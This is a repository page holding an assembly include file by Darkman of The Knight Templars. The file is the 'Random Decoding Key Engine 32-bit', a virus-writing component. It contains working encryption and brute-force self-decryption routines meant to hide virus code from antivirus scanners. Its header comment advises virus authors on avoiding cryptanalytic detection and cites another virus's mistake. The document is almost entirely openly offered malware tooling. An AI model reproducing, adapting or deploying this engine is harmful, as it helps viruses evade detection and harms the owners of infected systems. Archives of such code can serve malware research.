-
Notifications
You must be signed in to change notification settings - Fork 23
/
Copy pathVirTool.Win32.Cryptor.Rdk.inc
240 lines (203 loc) · 7.83 KB
/
VirTool.Win32.Cryptor.Rdk.inc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
comment *
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
ßßßÛÛÛÛÛÛ ÜÜ ßßß ßßß ÜÜÜ ÛÛÛÛÛÛßßß
±ÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ°
ÛÛÛÛ ÛÛÛÛÛÛ ²ÛÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ² ÛÛÛÛ
°ÛÛÛÛ ÛÛÛÛÛßÛÛÛÛß ÛÛÛÛ
±ÛÛÛÛ ÛÛÛÛ² ÛÛÜÜ ÛÛÛÛ°
ÜÜÜÜÜÜÜÜÜÜÜÜÜ ²ÛÛÛÛ ÛÛÛÛ± ÛÛÛÛ²Ü ÛÛÛÛ± ÜÜÜÜÜÜÜÜÜÜÜÜ
Û ÛÛÛÛÛ ÛÛÛÛ² ²ÛÛÛÛÛ° ÛÛÛÛ² Û
Û ÛÛÛÛÛ ÜÛÛÛÛÛ ²ÛÛÛÛ² ÛÛÛÛÛ Û
ßÜ ßßßßß ßßßß ßßßß ßßßßß Üß
ÜßßßßßßßßßßßßßßßßþThe Knight TemplarsþßßßßßßßßßßßßßßßÜ
Û Û
Û Random Decoding Key Engine 32-bit v 1.0 [RDKE32] Û
Û Code by Û
Û Darkman/TKT Û
Û Û
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
Do not use this engine to encrypt known plaintext such as the actual virus
code. It is possible to decrypt known plaintext encrypted with this
engine using the X-RAY technique, also known as cryptanalysis. You can read
more about this technique in "Detecting oh, roughly every polymorphic engine
out there", an article by Rhincewind/VLAD, published in VLAD Magazine issue
4. Billy Belcebu/iKx did this mistake in Win32.Legacy using his Internal
ENCryptor v 1.0 [iENC], a Random Decoding Key (RDK) engine using a 8-bit
eXclusive OR (XOR) algorithm to encrypt the actual virus in 19 different
blocks.
Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.
*
hash_size equ (0a0h/08h)
_RDKE32Encrypt struc
_lpHash dd ?
_lpBuffer dd ?
_dwNumberOfBytesToHashAndEncrypt dd ?
_dwSecurityLevel dd ?
ends
_RDKE32Decrypt struc
_lpHash dd ?
_lpBuffer dd ?
_dwNumberOfBytesToDecrypt dd ?
ends
_pushad struc
_edi dd ?
_esi dd ?
_ebp dd ?
_esp dd ?
_ebx dd ?
_edx dd ?
_ecx dd ?
_eax dd ?
ends
rdke32_begin:
; RDKE32Encrypt
;
;
; The RDKE32Encrypt function creates a hash and encrypts data.
;
; VOID RDKE32Encrypt(
; LPVOID lpHash // data buffer to receive hash
; LPVOID lpBuffer // data buffer of data to hash and encrypt
; DWORD dwNumberOfBytesToHashAndEncrypt // number of bytes to hash and
; // encrypt
; DWORD dwSecurityLevel // security level
; );
;
; Parameters
; lpHash
; [out] Pointer to the buffer that receives the hash.
; lpBuffer
; [out] Pointer to the buffer containing the data to be hashed and encrypted.
; dwNumberOfBytesToHashAndEncrypt
; [in] Specifies the number of bytes to be hashed and encrypted.
; dwSecurityLevel
; [in] Specifies the security level of the encryption. The higher it is the
; longer it will take for RDKE32Decrypt to bruteforce and decrypt the
; encrypted data.
;
; Return Values
; This function does not return a value.
RDKE32Encrypt proc ; Random Decoding Key Engine 32-bit
; v 1.00 [RDKE32] encryptor
pushad
mov edi,[esp._lpHash+size _pushad+04h]
; Pointer to the buffer that receives
; the hash
mov ebx,[esp._lpBuffer+size _pushad+04h]
; Pointer to the buffer containing the
; data to be hashed and encrypted
mov ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
; Specifies the number of bytes to be
; hashed and encrypted
mov eax,[esp._dwSecurityLevel+size _pushad+04h]
; Specifies the security level
call SHA1, edi, ecx, ebx
insecure_key:
call GetRandomNumberWithinRange
call test_key_security
jz insecure_key
call cryptor
popad
ret size _RDKE32Encrypt
endp
; RDKE32Decrypt
;
;
; The RDKE32Decrypt function creates a hash and encrypts data.
;
; VOID RDKE32Decrypt(
; LPVOID lpHash // data buffer of hash
; LPVOID lpBuffer // data buffer of data to decrypt
; DWORD dwNumberOfBytesToDecrypt // number of bytes to decrypt
; );
;
; Parameters
; lpHash
; [in] Pointer to the buffer containing the hash.
; lpBuffer
; [out] Pointer to the buffer containing the data to decrypted.
; dwNumberOfBytesToDecrypt
; [in] Specifies the number of bytes to be decrypted.
;
; Return Values
; This function does not return a value.
RDKE32Decrypt proc ; Random Decoding Key Engine 32-bit
; v 1.00 [RDKE32] decryptor
pushad
mov edi,[esp._lpHash+size _pushad+04h]
; Pointer to the buffer of the hash
mov ebx,[esp._lpBuffer+size _pushad+04h]
; Pointer to the buffer containing the
; data to be decrypted
mov ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
; Specifies the number of bytes to be
; decrypted
sub esp,hash_size
mov esi,esp ; ESI = pointer to the hash
xor edx,edx
bruteforce_loop:
inc edx ; EDX = 32-bit encryption/decryption
; key
call test_key_security
jz bruteforce_loop
call cryptor
call SHA1, esi, ecx, ebx
pushad
push (hash_size/04h)
pop ecx
rep cmpsd ; Succesfully decrypted the buffer to
; be decrypted?
popad
je RDKE32Decrypt_exit
call cryptor
jmp bruteforce_loop
RDKE32Decrypt_exit:
add esp,hash_size
popad
ret size _RDKE32Decrypt
endp
test_key_security proc ; Test the security of the 32-bit key
pushad
test eax,eax ; Insecure key?
jz test_key_exit
push 03h
pop ecx
test_key_loop:
mov eax,edx ; EDX = 32-bit encryption/decryption
; key
mov ebx,ecx
_test_key_loop:
rol eax,08h
test al,dl
jz test_next_key
cmp al,dl ; Insecure key?
je test_key_exit
test_next_key:
dec ebx
jnz _test_key_loop
rol edx,08h
loop test_key_loop
inc ecx ; Secure key
test_key_exit:
popad
ret
endp
cryptor proc ; 32-bit encryptor/decryptor
pushad
crypt_loop:
inc ecx
test dl,dl ; Insecure key?
jz dont_crypt
dec ecx
xor [ebx],dl
inc ebx
dont_crypt:
rol edx,08h
loop crypt_loop
popad
ret
endp
db ' [RDKE32] '
rdke32_end:
rdke32_size equ (rdke32_end-rdke32_begin)